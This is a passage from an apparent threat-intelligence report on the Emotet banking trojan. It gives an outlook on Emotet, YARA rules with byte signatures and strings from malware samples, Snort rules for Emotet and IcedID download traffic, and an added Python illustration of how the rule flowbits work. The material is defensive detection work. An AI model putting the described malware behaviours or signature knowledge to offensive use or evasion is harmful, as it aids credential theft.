● Defenders can block IPs uploaded to Feodo Tracker. Feodo Tracker is an open source feed that tracks command and control infrastructure used by variants and descendants of the Feodo banking trojan, including Emotet and Dridex. This list is not all-encompassing but can provide potential live C2 infrastructure for monitoring, hunting, or blocking. This feed can be accessed in Recorded Future as a source, as seen in this query.
 


 
Outlook 
 
Recorded Future assesses that Emotet is an advanced, modular banking trojan that primarily functions as a downloader or dropper of other banking trojans. Emotet commonly abuses legitimate or native Windows tools to gather information, incorporating utilities developed by Nirsoft, in an effort to make its behavior difficult to detect.  
 
Emotet has recently been acting as spam-sending malware that infects target systems and then loads other malware families onto the host. Emotet operators are not selective about targeting a specific industry or region, instead spreading without discretion. The malware operators appear more interested in spawning further Emotet infections in large volumes than in monetizing their current victims to generate profit. The infected hosts that distribute spam and occasionally act as proxies for the command and control servers form a decentralized network, making it difficult for defenders to block at their perimeter.  
 
 
 
 
 
 
   


Appendix A: YARA Rules  

import "pe" 
 
rule Emotet_Certificate {
    meta:
        description = "Detects a compromised certificate abused by Emotet"
        Author = "Insikt Group, Recorded Future"
        date = "2018-11-01"
        hash = "919368A0286FDAD494A16388C83A571E6B9C285A"
    condition:
        uint16(0) == 0x5a4d and
        for any i in (0 .. pe.number_of_signatures) : (
            pe.signatures[i].issuer contains "thawte SHA256 Code Signing CA" and
            // the pe module renders serial numbers as lowercase hex, so the comparison must be lowercase too
            pe.signatures[i].serial == "38:6b:c7:cb:6d:b4:03:1a:6c:dc:2d:67:07:13:b6:1a"
        )
}

__________________________________________ 
 
rule Emotet {
    meta:
        author = "kevoreilly"
        description = "Emotet Payload"
        cape_type = "Emotet Payload"
    strings:
        $snippet1 = {FF 15 ?? ?? ?? ?? 83 C4 0C 68 40 00 00 F0 6A 18}
        $snippet2 = {6A 13 68 01 00 01 00 FF 15 ?? ?? ?? ?? 85 C0}
        $snippet3 = {83 3D ?? ?? ?? ?? 00 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 74 0A 51 E8 ?? ?? ?? ?? 83 C4 04 C3 33 C0 C3}
        $snippet4 = {33 C0 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 74 1D 8D 49 00 40 A3 ?? ?? ?? ?? 83 3C C5 ?? ?? ?? ?? 00 75 F0 51 E8 ?? ?? ?? ?? 83 C4 04 C3}
    condition:
        // check for MZ signature at offset 0
        uint16(0) == 0x5A4D and (($snippet1) and ($snippet2)) or ($snippet3) or ($snippet4)
}
 
__________________________________________ 
 
rule emotet_vbinject {
    strings:
        // data from the overlay
        $overlay = { BC4F626B1602B4C72F272F597BB633B1 }
        $pdb = { 433A5C55736572735C4D5C4465736B746F705C737475627372635C42475C52656C656173655C42472E70646200 }

        // various signatures used in vbinject samples to denote beginning/end of payload executable

        $signature1 = "Ln15vg7sJn47WWEu8" ascii wide
        $signature2 = "6LojxNhv15weO85g1Az48poUhg" ascii wide
        $signature3 = "Ln15vg7sJn47WWEu8"
        $signature4 = "6LojxNhv15weO85g1Az48poUhg"
        $signature5 = "2659443231247816597746"

        // compressed pe payload header located in overlay section
        $compressed_pe_header1 = "is)xrnnram canoot j"
        $compressed_pe_header2 = "rue%hn DOS fodd"

        // function prologue for a payload extraction function
        // 50512C47F028FD3BB80ACDEE84F2729B @ 0x4054E7
        $epilogue = { 8B45088B55DC8BC85F5E5B89118B55E08951048B55E48951088B55E889510C8B4DEC64890D000000008BE55DC21000 }
    condition:
        // the original referenced an undefined helper rule (IsPeFile); the MZ check it stands for is inlined here
        uint16(0) == 0x5A4D and (any of them)
}
 
__________________________________________ 
 
 
rule emotet4_basic : trojan {
    meta:
        author = "psrok1/mak"
        module = "emotet"
    strings:
        $emotet4_rsa_public = { 8d ?? ?? 5? 8d ?? ?? 5? 6a 00 68 00 80 00 00 ff 35 [4] ff 35 [4] 6a 13 68 01 00 01 00 ff 15 [4] 85 }
        $emotet4_cnc_list = { 39 ?? ?5 [4] 0f 44 ?? (FF | A3) }
    condition:
        all of them
}
 
 
__________________________________________ 
 
 
rule emotet4 : trojan {
    meta:
        author = "psrok1"
        module = "emotet"
    strings:
        $emotet4_x65599 = { 0f b6 ?? 8d ?? ?? 69 ?? 3f 00 01 00 4? 0? ?? 3? ?? 72 }
    condition:
        // depends on emotet4_basic being defined earlier in the same rule file
        any of them and emotet4_basic
}
 
 


__________________________________________ 
 
 
rule emotet4_spam : spambot {
    meta:
        author = "mak"
        module = "emotet"
    strings:
        $login = "LOGIN" fullword
        $startls = "STARTTLS" fullword
        $mailfrom = "MAIL FROM:"
    condition:
        // depends on emotet4_basic being defined earlier in the same rule file
        all of them and emotet4_basic
}

Appendix B — Network Monitoring 


 
All SNORT signatures are from Lenny Hansson. 
 
(Emotet Banking Malware - whoami lookups) 
 
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"NF - Emotet Banking Malware - whoami - No Alert"; flow:to_server,established; content:"/whoami.php"; depth:15; fast_pattern; content:"Cache|2d|Control|3a 20|no|2d|cache"; flowbits:set,NF-twhoami; flowbits:noalert; reference:url,networkforensic.dk; metadata:27062018; classtype:trojan-activity; sid:5025903; rev:1;)
__________________________________________ 
 
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"NF - Emotet Banking Malware - whoami lookup"; flow:to_client,established; content:"|32 30 30 20 4f 4b|"; fast_pattern; content:"Connection|3a 20|keep|2d|alive"; flowbits:isset,NF-twhoami; reference:url,networkforensic.dk; metadata:27062018; classtype:trojan-activity; sid:5025904; rev:1;)
__________________________________________ 
 
(Emotet Banking Malware - IcedID payload download) 
 
alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"NF - Emotet Banking Malware - IcedID payload download - No alert"; flow:to_server,established; content:"GET"; depth:3; http_method; pcre:"/\/[a-zA-Z0-9]{4,10}\//iU"; content:"Connection|3a 20|Keep|2d|Alive"; nocase; flowbits:set,NF-IcedID; flowbits:noalert; reference:url,networkforensic.dk; metadata:27062018; classtype:trojan-activity; sid:5025905; rev:1;)
__________________________________________ 
 
alert tcp $EXTERNAL_NET 80 -> $HOME_NET any (msg:"NF - Emotet Banking Malware - IcedID payload download"; flow:from_server,established; content:"200"; http_stat_code; content:"Cache|2d|Control|3a 20|no|2d|cache|2c 20|no|2d|store|2c 20|max|2d|age|3d|0|2c 20|must|2d|revalidate"; nocase; fast_pattern; content:"Content|2d|Disposition|3a 20|attachment|3b 20|"; pcre:"/filename=\"[a-zA-Z0-9]{4,6}.exe\"/"; flowbits:isset,NF-IcedID; reference:url,networkforensic.dk; metadata:27062018; classtype:trojan-activity; sid:5025906; rev:1;)
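Added illustration, not part of the report or of Lenny Hansson's rule set: a toy Python matcher that replays the whoami rule pair above (sids 5025903 and 5025904) over constructed HTTP exchanges, showing how the first rule's flowbits:set with noalert and the second rule's flowbits:isset combine so that only a completed lookup alerts (the same pairing the IcedID rules use). The matcher understands only content, depth and flowbits, and the sample flows are constructed.

```python
# Toy re-implementation of the whoami rule pair above (content, depth and flowbits only);
# added for illustration, it is not Snort's matching engine.
RULES = [
    {"sid": 5025903, "dir": "to_server", "noalert": True, "set": "NF-twhoami",
     "contents": [(b"/whoami.php", 15), (b"Cache-Control: no-cache", None)]},
    {"sid": 5025904, "dir": "to_client", "noalert": False, "isset": "NF-twhoami",
     "contents": [(b"200 OK", None), (b"Connection: keep-alive", None)]},
]

# Constructed HTTP request/response pairs, one per TCP flow (not captured traffic).
SAMPLE_FLOWS = {
    "whoami-lookup": (  # request sets the flowbit, the reply then alerts
        b"GET /whoami.php HTTP/1.1\r\nHost: example.invalid\r\nCache-Control: no-cache\r\n\r\n",
        b"HTTP/1.1 200 OK\r\nConnection: keep-alive\r\nContent-Length: 12\r\n\r\n203.0.113.9\n"),
    "benign-page": (  # a keep-alive 200 OK on its own must not alert
        b"GET /index.html HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
        b"HTTP/1.1 200 OK\r\nConnection: keep-alive\r\n\r\n<html></html>"),
    "no-cache-missing": (  # first rule fails its second content, so the flowbit is never set
        b"GET /whoami.php HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
        b"HTTP/1.1 200 OK\r\nConnection: keep-alive\r\n\r\n"),
}

def rule_matches(rule, payload, flowbits):
    """All contents must be found (inside their depth, if given) and any isset bit must be set."""
    for needle, depth in rule["contents"]:
        if needle not in (payload if depth is None else payload[:depth]):
            return False
    return "isset" not in rule or flowbits.get(rule["isset"], False)

def evaluate_flow(request, response):
    """Run the rules over one flow's request then response; return the sids that alert."""
    flowbits, alerts = {}, []
    for direction, payload in (("to_server", request), ("to_client", response)):
        for rule in RULES:
            if rule["dir"] != direction or not rule_matches(rule, payload, flowbits):
                continue
            if "set" in rule:
                flowbits[rule["set"]] = True  # state carried to later packets of this flow
            if not rule["noalert"]:
                alerts.append(rule["sid"])
    return alerts

def alerting_flows(flows):
    """Map flow name -> alerting sids, keeping only flows that produced an alert."""
    results = {name: evaluate_flow(req, resp) for name, (req, resp) in flows.items()}
    return {name: sids for name, sids in results.items() if sids}
```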
 
 
 
 
 
About Recorded Future 
 
Recorded Future arms security teams with the only complete threat intelligence solution powered by patented machine learning to 
lower risk. Our technology automatically collects and analyzes information from an unrivaled breadth of sources and provides 
invaluable context in real time and packaged for human analysis or integration with security technologies.  
